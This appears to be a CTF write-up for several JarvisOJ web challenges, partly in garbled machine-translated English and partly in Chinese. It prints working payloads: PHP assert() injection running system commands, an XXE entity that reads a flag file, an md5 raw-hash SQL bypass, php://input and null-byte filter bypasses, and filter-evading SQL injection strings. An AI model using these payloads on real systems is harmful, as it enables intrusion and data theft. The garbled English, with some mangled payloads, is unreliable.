JarvisOJ web portion of the solution to a problem (updating ...)

babyphp

First, look at the source code right

out of the sand sculpture after url lost under? Page = fhlag, of course, do not see the results, but we can know flag.php this file from here

I saw GIT, GIT think of source code disclosure, with a bit Gangster tools to obtain the source code

you can see we want flag.php, of course, is no flag to open the
can get the code from index.php judge

<?php
if (isset($_GET['page'])) {
	$page = $_GET['page'];
} else {
	$page = "home";
}
$file = "templates/" . $page . ".php";
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");
assert("file_exists('$file')") or die("That file doesn't exist!");
?>

See the assert () function code execution backhand a reading flag.php
small garbage after several tests with reference Gangster wp, get payload:?. Page = flag'.system ( ls) '
This will be flag'.system . (ls) 'as the strpos () of the first parameter
$file = "templates/" . "flag'.syatem(ls).'" . ".php";
assert("strpos('flag.'syatem(ls).'', '..') === false") or die("Detected hacking attempt!");
lists all the documents

then use cat command to read the file flag.php

obtained flag in the source

Conclusion: the code must be spliced good!

admin

No ideas, capturing Packet see there is no useful information, so he scanned the web directory
really have. . .

Cute robot saw it, go in and see

tips /admin_s3cr3t.php page

directly to the flag, and I thought what you want to continue looking
okay that I cheated. . . Wrong Answer trained, trained, trained,
and then capture a look, change the value of the next line admin

localhost

What IP addresses can be forged

PORT51

十分天真的用 http://web.jarvisoj.com:51/试了试
其实应该是用公网ip端口访问，而不是改目的端口访问
windows用这个命令就行
curl --local-port 51 http://web.jarvisoj.com:32770/
但是服务器好像出了问题没有给flag

LOGIN

一开始眼瞎没有看到响应包的提示还进行爆破了…尬笑
也是第一次知道md5($pass,true)

具体原理参考：https://www.freebuf.com/column/150063.html写的超级棒！
输入ffifdyop得到flag

神盾局的秘密

通过审查元素大法发现图片来源为src="showimg.php?img=c2hpZWxkLmpwZw==",猜测任意文件读取漏洞

试着读取index.php,得到源码

应该是利用反序列化，先看下shield.php中Shield类的定义

接下来就是构造序列化字段了
经过我不太熟练的构造，get it~(查看源码可得)

WEB?

一开始看到这个登录框还以为是sql注入。。。抓包也没有发现什么提示

看源码又没看出个什么。。。看了大佬们的wp说是app.js有问题

复制在app.js搜索一下

再看下checkpass()

25元一次方程组，hhhhhh，笔算是不可能笔算的,上python

data = [81,87,66,123,82,51,97,99,55,95,49,115,95,105,110,116,101,114,101,115,116,105,110,103,125]
flag = ''
for i in data:
    flag += chr(i)
print flag

结语：一直以为源码的js啥的没啥好看的，是我孤陋寡闻了
dbq又触及到我的知识盲区了

api调用

That is what the command injection code injection, is a read wp title
XXE vulnerability studied
, although recently to see, but look at all the principle has not practiced

]> Reference to an external file

1. Change capture type Content: file application / xml
2. inject code xml configuration, since the tips, with the view command system

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xdsec [
<!ELEMENT methodname ANY >
<!ENTITY xxe SYSTEM "/home/ctf/flag.txt" >]>
<methodcall>
<methodname>&xxe;</methodname>
</methodcall>

I found a xml code. . . I will not write

In a mess

Right-get source code hint: index.phps
get the code in index.phps

<?php
error_reporting(0);
echo "<!--index.phps-->";

if(!$_GET['id'])
{
	header('Location: index.php?id=1');
	exit();
}
$id=$_GET['id'];
$a=$_GET['a'];
$b=$_GET['b'];
if(stripos($a,'.'))
{
	echo 'Hahahahahaha';
	return ;
}
$data = @file_get_contents($a,'r');
if($data=="1112 is a nice lab!" and $id==0 and strlen($b)>5 and eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4)
{
	require("flag.txt");
}
else
{
	print "work harder!harder!harder!";
}
?>

The key point is:

 $data = @file_get_contents($a,'r');
    if($data=="1112 is a nice lab!" and $id==0 and strlen($b)>5 and eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4)

id weak bypass type, a pseudo bypassing protocol, b using the characteristic (cutoff 00) eregi () function is bypassed
so payload:

?a=php://input&id=0a&b=%004qqqqq
POST:1112 is a nice lab!

To enter the catalog? ? ? id = 1 Is sql injection?

See add single quotation marks, and then if it does not

query the database name
? ID = -1 / 12 is / uniunionon / H / seselectlect / H / 1,2, (selselectect / H / context / H / frofromm / H / Content)% 23 is

burst table name

?id=-1/*h*/uniunionon/*h*/seselectlect/*h*/1,2,(seselectlect/*h*/group_concat(table_name)/*h*/frofromm/*h*/information_schema.tables/*h*/where/*h*/table_schema=database())#

Burst column name, table name to the attention hex encoding

?id=-1/*h*/uniunionon/*h*/seselectlect/*h*/1,2,(seselectlect/*h*/group_concat(column_name)/*h*/frofromm/*h*/information_schema.columns/*h*/where/*h*/table_name=0x636f6e74656e74)#

Reading content

?id=-1/*h*/uniunionon/*h*/seselectlect/*h*/1,2,(selselectect/*h*/context/*h*/frofromm/*h*/content)%23